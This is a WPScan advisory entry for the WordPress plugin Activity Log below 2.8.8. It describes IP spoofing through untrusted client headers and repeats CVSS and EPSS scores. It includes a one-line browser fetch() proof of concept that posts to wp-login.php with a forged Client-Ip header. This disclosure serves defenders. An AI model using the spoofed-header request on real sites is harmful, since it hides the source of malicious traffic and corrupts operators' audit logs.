Lucene search

K
wpvulndbBartlomiej MarekWPVDB-ID:F5EA6C8A-6B07-4263-A1BE-DD033F078D49
HistorySep 01, 2023 - 12:00 a.m.

Activity Log < 2.8.8 - IP Spoofing

2023-09-0100:00:00
Bartlomiej Marek
wpscan.com
6
ip spoofing
untrusted headers
manipulation

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

0.0005 Low

EPSS

Percentile

14.3%

Description This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

PoC

Run the following code in the web browser and note on the backend that the IP address has been faked. await fetch(“/wp-login.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, “Client-Ip”: “8.8.8.8”, }, “body”: “log=USERNAME&pwd;=PASSWORD”, “method”: “POST”, “mode”: “cors”, “credentials”: “include” });

CPENameOperatorVersion
eq2.8.8

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

0.0005 Low

EPSS

Percentile

14.3%

Related for WPVDB-ID:F5EA6C8A-6B07-4263-A1BE-DD033F078D49